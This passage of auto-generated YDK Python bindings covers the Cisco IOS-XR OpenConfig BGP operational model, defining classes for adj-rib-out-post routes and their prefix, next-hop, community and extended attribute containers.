self._leafs = OrderedDict()
# 'route' is a YANG list, bound as a YList of Route entries.
self.route = YList(self)
self._segment_path = lambda: "routes"
# Set last: presumably gates subsequent writes through _perform_setattr — confirm in ydk _Entity_.
self._is_frozen = True
# No leafs here, so the allowed-attribute list is empty; writes still go through _Entity_ validation.
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2 requires the fully-qualified super() form; Python 3 can use the bare call.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route, self).__init__()
self.yang_name = "route"
self.yang_parent_name = "routes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
# Child containers keyed by YANG name -> (python attribute, binding class).
self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved))])
# 'route' and 'neighbor_address' are unions of two string patterns (IPv4/IPv6), hence ['str','str'].
self._leafs = OrderedDict([
('route', (YLeaf(YType.str, 'route'), ['str','str'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
])
self.route = None
self.neighbor_address = None
self.path_id = None
self.valid_route = None
self.invalid_reason = None
self.best_path = None
# Eagerly instantiate singleton child containers and parent-link them.
self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName()
self.prefix_name.parent = self
self._children_name_map["prefix_name"] = "prefix-name"
self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList()
self.route_attr_list.parent = self
self._children_name_map["route_attr_list"] = "route-attr-list"
self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList()
self.ext_attributes_list.parent = self
self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate()
self.last_modified_date.parent = self
self._children_name_map["last_modified_date"] = "last-modified-date"
self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved()
self.last_update_recieved.parent = self
self._children_name_map["last_update_recieved"] = "last-update-recieved"
self._segment_path = lambda: "route"
# Set last: presumably gates subsequent writes through _perform_setattr — confirm in ydk _Entity_.
self._is_frozen = True
# Route attribute writes through _Entity_ validation for the declared leaf names.
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
"""
Prefix
.. attribute:: prefix
Prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix>`
**config**\: False
.. attribute:: prefix_length
Prefix length
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName, self).__init__()
self.yang_name = "prefix-name"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix))])
self._leafs = OrderedDict([
('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
])
self.prefix_length = None
self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self._segment_path = lambda: "prefix-name"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName, ['prefix_length'], name, value)
class Prefix(_Entity_):
    """
    Prefix
    .. attribute:: afi
    AFI
    **type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
    **config**\: False
    .. attribute:: ipv4_address
    IPv4 Addr
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    **config**\: False
    .. attribute:: ipv6_address
    IPv6 Addr
    **type**\: str
    **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
    **config**\: False
    """
    # Identity of the generating YANG module.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'
    def __init__(self):
        # Python 2/3 compatible base initialization.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix, self).__init__()
        # YANG statement names for path construction.
        self.yang_name = "prefix"
        self.yang_parent_name = "prefix-name"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Leaf-only container: no child container classes.
        self._child_classes = OrderedDict([])
        # Leaf metadata: python attribute -> (YLeaf binding, accepted python types).
        self._leafs = OrderedDict([
            ('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
            ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
            ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
        ])
        self.afi = None
        self.ipv4_address = None
        self.ipv6_address = None
        # Relative segment path; the parent entity supplies the ancestor path.
        self._segment_path = lambda: "prefix"
        # After freezing, attribute writes are routed through __setattr__ below.
        self._is_frozen = True
    def __setattr__(self, name, value):
        # Route all writes through YDK validation of the listed leaf names.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
    @staticmethod
    def _meta_info():
        # Lazily import the generated meta table and return this class's entry.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-information record for PrefixName."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    table_entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName']
    return table_entry['meta_info']
class RouteAttrList(_Entity_):
    """
    RouteAttributesList
    .. attribute:: next_hop
    NextHopAddress
    **type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop>`
    **config**\: False
    .. attribute:: aggregrator_attributes
    AggregatorList
    **type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes>`
    **config**\: False
    .. attribute:: origin_type
    Origin Attribute Type
    **type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
    **config**\: False
    .. attribute:: as_path
    AS Path
    **type**\: str
    **config**\: False
    .. attribute:: as4_path
    AS4 Path
    **type**\: str
    **config**\: False
    .. attribute:: med
    Med
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: local_pref
    LocalPref
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: atomic_aggr
    AtomicAggr
    **type**\: bool
    **config**\: False
    .. attribute:: community
    CommunityArray
    **type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community>`
    **config**\: False
    """
    # Identity of the generating YANG module.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'
    def __init__(self):
        # Python 2/3 compatible base initialization.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList, self).__init__()
        # YANG statement names for path construction.
        self.yang_name = "route-attr-list"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Child container classes keyed by their YANG element name.
        self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community))])
        # Leaf metadata: python attribute -> (YLeaf binding, accepted python types).
        self._leafs = OrderedDict([
            ('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
            ('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
            ('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
            ('med', (YLeaf(YType.uint32, 'med'), ['int'])),
            ('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
            ('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
        ])
        self.origin_type = None
        self.as_path = None
        self.as4_path = None
        self.med = None
        self.local_pref = None
        self.atomic_aggr = None
        # Pre-built child container entities, parented to this node.
        self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop()
        self.next_hop.parent = self
        self._children_name_map["next_hop"] = "next-hop"
        self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes()
        self.aggregrator_attributes.parent = self
        self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
        # 'community' is a YANG list; entries are appended by the caller.
        self.community = YList(self)
        # Relative segment path; the parent entity supplies the ancestor path.
        self._segment_path = lambda: "route-attr-list"
        # After freezing, attribute writes are routed through __setattr__ below.
        self._is_frozen = True
    def __setattr__(self, name, value):
        # Route all writes through YDK validation of the listed leaf names.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)
    class NextHop(_Entity_):
        """
        NextHopAddress
        .. attribute:: afi
        AFI
        **type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
        **config**\: False
        .. attribute:: ipv4_address
        IPv4 Addr
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **config**\: False
        .. attribute:: ipv6_address
        IPv6 Addr
        **type**\: str
        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
        **config**\: False
        """
        # Identity of the generating YANG module.
        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'
        def __init__(self):
            # Python 2/3 compatible base initialization.
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop, self).__init__()
            self.yang_name = "next-hop"
            self.yang_parent_name = "route-attr-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            # Leaf-only container: no child container classes.
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
                ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
                ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
            ])
            self.afi = None
            self.ipv4_address = None
            self.ipv6_address = None
            self._segment_path = lambda: "next-hop"
            # After freezing, attribute writes are routed through __setattr__ below.
            self._is_frozen = True
        def __setattr__(self, name, value):
            # Route all writes through YDK validation of the listed leaf names.
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
        @staticmethod
        def _meta_info():
            # Lazily import the generated meta table and return this class's entry.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop']['meta_info']
    class AggregratorAttributes(_Entity_):
        """
        AggregatorList
        .. attribute:: as_
        AS number
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        .. attribute:: as4
        AS4 number
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        .. attribute:: address
        IPv4 address
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **config**\: False
        """
        # Identity of the generating YANG module.
        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'
        def __init__(self):
            # Python 2/3 compatible base initialization.
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
            self.yang_name = "aggregrator-attributes"
            self.yang_parent_name = "route-attr-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            # Leaf-only container: no child container classes.
            self._child_classes = OrderedDict([])
            # 'as_' carries a trailing underscore because 'as' is a Python keyword.
            self._leafs = OrderedDict([
                ('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
                ('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
                ('address', (YLeaf(YType.str, 'address'), ['str'])),
            ])
            self.as_ = None
            self.as4 = None
            self.address = None
            self._segment_path = lambda: "aggregrator-attributes"
            # After freezing, attribute writes are routed through __setattr__ below.
            self._is_frozen = True
        def __setattr__(self, name, value):
            # Route all writes through YDK validation of the listed leaf names.
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)
        @staticmethod
        def _meta_info():
            # Lazily import the generated meta table and return this class's entry.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
    class Community(_Entity_):
        """
        CommunityArray
        .. attribute:: objects
        BGP OC objects
        **type**\: str
        **config**\: False
        """
        # Identity of the generating YANG module.
        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'
        def __init__(self):
            # Python 2/3 compatible base initialization.
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community, self).__init__()
            self.yang_name = "community"
            self.yang_parent_name = "route-attr-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            # Leaf-only container: no child container classes.
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('objects', (YLeaf(YType.str, 'objects'), ['str'])),
            ])
            self.objects = None
            self._segment_path = lambda: "community"
            # After freezing, attribute writes are routed through __setattr__ below.
            self._is_frozen = True
        def __setattr__(self, name, value):
            # Route all writes through YDK validation of the listed leaf names.
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community, ['objects'], name, value)
        @staticmethod
        def _meta_info():
            # Lazily import the generated meta table and return this class's entry.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community']['meta_info']
    @staticmethod
    def _meta_info():
        # Lazily import the generated meta table and return this class's entry.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
    """
    ExtAttributesList
    .. attribute:: originator_id
    OriginatorID
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    **config**\: False
    .. attribute:: aigp
    AIGP
    **type**\: int
    **range:** 0..18446744073709551615
    **config**\: False
    .. attribute:: path_id
    PathId
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: cluster
    ClusterList
    **type**\: list of str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    **config**\: False
    .. attribute:: ext_community
    ExtendedCommunityArray
    **type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity>`
    **config**\: False
    .. attribute:: unknown_attributes
    UnknownAttributes
    **type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes>`
    **config**\: False
    """
    # Identity of the generating YANG module.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'
    def __init__(self):
        # Python 2/3 compatible base initialization.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList, self).__init__()
        # YANG statement names for path construction.
        self.yang_name = "ext-attributes-list"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Child container classes keyed by their YANG element name.
        self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes))])
        # Leaf metadata; 'cluster' is a leaf-list, hence YLeafList.
        self._leafs = OrderedDict([
            ('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
            ('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
            ('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
            ('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
        ])
        self.originator_id = None
        self.aigp = None
        self.path_id = None
        self.cluster = []
        # YANG lists; entries are appended by the caller.
        self.ext_community = YList(self)
        self.unknown_attributes = YList(self)
        # Relative segment path; the parent entity supplies the ancestor path.
        self._segment_path = lambda: "ext-attributes-list"
        # After freezing, attribute writes are routed through __setattr__ below.
        self._is_frozen = True
    def __setattr__(self, name, value):
